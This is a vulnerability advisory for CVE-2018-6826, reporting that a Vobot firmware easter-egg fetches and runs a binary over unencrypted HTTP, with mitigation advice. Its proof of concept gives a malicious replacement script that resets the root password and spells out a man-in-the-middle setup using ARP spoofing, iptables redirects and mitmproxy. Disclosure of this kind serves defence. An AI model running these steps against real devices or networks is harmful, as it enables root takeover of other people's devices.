CVE-2018-6826 Remote code execution via easter-egg

6. February 2018 - Thomas Roth - thomas.roth@leveldown.de

Products affected

Severity

CVS: 9.6 Critical

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

This vulnerability has been confirmed to be exploitable. The vulnerability will potentially be published after 60 days or after a patch for the vulnerability has been released.

Description

It was found that the Vobot firmware has an easter-egg that starts a Breakout video game, which can be invoked by pressing the volume-down button the on back of the device for ca. 3 seconds. The shell script that implements this easter-egg (located in /usr/sbin/game_breakout) uses the wget utility to download the game from the URL http://file.myvobot.com/plugin/game/breakout to /tmp/breakout and executes it.

An attacker that conducts a man-in-the-middle attack can intercept the HTTP request and supply his own binary which is then executed with root permissions on the device.

Mitigation

The connection should at least use HTTPS (with certificate validation, see the CVE-2018-6827 vulnerability report). This soltuion will still pose an issue if the server (or the TLS connection) is compromised as no additional validation of the binary is done (e.g. a signature verification), as such it is recommended to do additional, digital signature based verification of all downloaded executables or firmware upgrades.

Example/Proof of concept

An attacker on the same network can conduct a man-in-the-middle attack using arp-spoofing. By then using a transparent proxy such as mitmproxy it is possible to intercept and modify all requests to the different servers and the Vobot client.

The attacker can then replace the response of the HTTP request to http://file.myvobot.com/plugin/game/breakout with a custom response, such as:

#!/bin/sh
passwd << EOF
test1234
test1234
EOF

This will set the root password of the device to test1234 which can be used by a network-local attacker to connect to the device using SSH (which is enabled by default, see CVE-2018-6826).

Example attack setup:

export VOBOT_IP=...   # e.g. 192.168.0.5
export GATEWAY_IP=... # e.g. 192.168.0.1
export INTERFACE=...  # e.g. wlan0
sysctl -w net.ipv4.ip_forward=1
iptables -t nat -A PREROUTING -i wlan0 -p tcp --dport 80 -j REDIRECT --to-port 8080
iptables -t nat -A PREROUTING -i wlan0 -p tcp --dport 443 -j REDIRECT --to-port 8080

# In separate terminals: 
arpspoof -i $INTERFACE -t $VOBOT_IP $GATEWAY_IP >/dev/null &
arpspoof -i $INTERFACE -t $GATEWAY_IP $VOBOT_IP >/dev/null &
mitmproxy -T --host

Disclosure timeline